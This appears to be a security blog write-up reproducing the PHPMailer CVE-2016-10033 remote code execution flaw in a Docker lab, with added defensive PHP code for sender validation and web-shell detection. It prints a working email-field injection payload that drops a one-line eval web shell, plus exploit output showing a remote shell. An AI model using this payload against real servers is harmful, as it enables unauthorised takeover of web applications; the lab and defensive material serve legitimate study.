PHPMailer remote command execution vulnerability reappears

I. Vulnerability introduction

PHPMailer is a PHP email creation and delivery class used by many open source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and so on.

PHPMailer < 5.2.18 has a security vulnerability (CVE-2016-10033) that allows an unauthenticated remote attacker to execute arbitrary code in the context of the web server user and thereby remotely control the target web application.
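The root cause is that a sender address taken from user input ends up in the fifth argument of PHP's mail(), which PHP passes to the local sendmail binary as extra command-line options. The following is an added example, not PHPMailer's own code: a validation helper in the spirit of the 5.2.18/5.2.20 fixes that refuses any envelope sender containing whitespace, quotes or backslashes before it can reach the sendmail command line. The function names and the constructed sample inputs are assumptions for illustration.

```php
<?php
// Added example, not PHPMailer's own code. It mirrors the hardening idea
// behind the 5.2.18/5.2.20 fixes: a sender address taken from user input
// must be validated before it ends up in the 5th argument of mail(),
// which PHP hands to the sendmail binary as extra command-line options.

declare(strict_types=1);

/**
 * Return true only for addresses that are safe to put on a sendmail command line.
 * Rejects whitespace, quotes and backslashes, then applies PHP's built-in validator.
 * (Assumed helper name.)
 */
function isSafeSenderAddress(string $address): bool
{
    if ($address === '' || strlen($address) > 254) {
        return false;
    }
    // Option injection needs a (possibly quoted) space to start a new argument,
    // so reject anything that could be used to break out of a single token.
    if (preg_match('/[\s"\'\\\\]/', $address)) {
        return false;
    }
    return filter_var($address, FILTER_VALIDATE_EMAIL) !== false;
}

/**
 * Build the mail() extra-parameters string from a validated sender.
 * Assumed helper; it throws rather than silently sending with an unsafe address.
 */
function buildEnvelopeSender(string $address): string
{
    if (!isSafeSenderAddress($address)) {
        throw new InvalidArgumentException('Refusing unsafe envelope sender');
    }
    // escapeshellarg() is the belt-and-braces step PHPMailer added in 5.2.20.
    return '-f' . escapeshellarg($address);
}

// Constructed inputs for a stand-alone run: a benign address, a quoted
// local part containing a space (accepted by FILTER_VALIDATE_EMAIL alone,
// which is why the character check comes first), and a bare space.
$samples = [
    'ops@example.com',
    '"a b"@example.com',
    'a@example.com b',
];
foreach ($samples as $s) {
    printf("%-25s => %s\n", $s, isSafeSenderAddress($s) ? 'accepted' : 'rejected');
}
```

The character check runs before filter_var() on purpose: PHP's email validator accepts RFC 5321 quoted local parts that contain spaces, and that leniency is what made the follow-up bypass against 5.2.18 possible, so validation alone is not enough without also escaping the argument.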

II. Affected versions:

PHPMailer < 5.2.18

III. Vulnerability reproduction

Docker environment:

docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033

Pull the image and start the environment:

http://192.168.1.107:8080/

Open http://192.168.1.107:8080/, type any name such as "aaa" in the name field, and in the email field enter: -queuedirectory =/ TMP /. -x /var/www/ HTML/[email protected] <? PHP @eval($_POST['thelostworld']) ? >

This uploads a one-line web shell. The page takes 3-5 minutes to respond, so the long wait is expected.

Web shell address: http://192.168.1.107:8080/a.php, password: thelostworld

Virtual terminal:

Using the script:

To obtain the script, reply "PHPMailer" to the account in the background.

➜ Desktop ./exploitor.sh 192.168.1.107:8080
[+] CVE-2016-10033 Exploits by Opsxcq
[+] Exploiting 192.168.1.107:8080
[+] Target exploited, Acessing shell at http://192.168.1.107:8080/backdoor.php
[+] Checking if the backdoor was created on the target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell>
[+] Running
RemoteShell> id
[+] Running id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Access the web shell address:

http://192.168.1.107:8080/backdoor.php
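Both reproduction paths above leave the same traces on the host: an affected PHPMailer version on disk and a freshly written .php file in the web root that evaluates request input. The following added triage script (not part of the original post) checks for both. It reads the $Version property from a PHPMailer class file, compares it against 5.2.18, and scans a directory for recently modified PHP files containing eval() on $_POST/$_GET/$_REQUEST. The directory layout and file names it builds for its stand-alone run are constructed for the demo; on a real host point it at the actual web root and PHPMailer path.

```php
<?php
// Added example (not from the original post): a small triage script a
// defender could run on a host like the lab container above. It checks
// whether the installed PHPMailer is older than 5.2.18 and looks for PHP
// files recently dropped into the web root that eval() request input,
// the pattern of the one-line web shell used on this page.
// Paths, file names and helper names are assumptions; adjust for a real host.

declare(strict_types=1);

function isAffectedVersion(string $version): bool
{
    return version_compare($version, '5.2.18', '<');
}

/** Read the $Version property from a PHPMailer class file; null if not found. */
function readPhpMailerVersion(string $classFile): ?string
{
    if (!is_readable($classFile)) {
        return null;
    }
    $src = file_get_contents($classFile);
    if (preg_match('/\$Version\s*=\s*[\'"]([0-9.]+)[\'"]/', $src, $m)) {
        return $m[1];
    }
    return null;
}

/** Return PHP files under $webroot modified after $sinceTs that eval request input. */
function findSuspiciousPhp(string $webroot, int $sinceTs): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($webroot, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if ($file->getExtension() !== 'php' || $file->getMTime() < $sinceTs) {
            continue;
        }
        $src = file_get_contents($file->getPathname());
        if (preg_match('/\beval\s*\(\s*\$_(POST|GET|REQUEST)\b/i', $src)) {
            $hits[] = $file->getPathname();
        }
    }
    sort($hits);
    return $hits;
}

// Stand-alone demo on a constructed directory
// (replace $root with /var/www/html on a real host).
$root = sys_get_temp_dir() . '/phpmailer-triage-' . getmypid();
mkdir($root);
file_put_contents("$root/class.phpmailer.php", "<?php class PHPMailer { public \$Version = '5.2.17'; }");
file_put_contents("$root/index.php", "<?php echo 'hello';");
file_put_contents("$root/a.php", "<?php @eval(\$_POST['thelostworld']); ?>");

$ver = readPhpMailerVersion("$root/class.phpmailer.php");
printf(
    "PHPMailer version %s: %s\n",
    $ver ?? 'unknown',
    $ver !== null && isAffectedVersion($ver) ? 'AFFECTED' : 'not affected'
);
foreach (findSuspiciousPhp($root, time() - 3600) as $hit) {
    echo "Suspicious web shell candidate: $hit\n";
}

// Remove the constructed demo directory.
array_map('unlink', glob("$root/*"));
rmdir($root);
```

On a real host, pair the file scan with the web server's own evidence: the PHPMailer container writes the dropped file as the www-data user, so a .php file in the web root owned by the web server account rather than the deployment user is itself worth flagging, even before its contents are inspected.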


Disclaimer: The security tools and procedures (methods) provided by this site may be offensive. They are intended only for security research and teaching; use them at your own risk!

Disclaimer: Copyright belongs to the author. For commercial reprints, please contact the author for authorization; for non-commercial reprints, please indicate the source.

thelostworld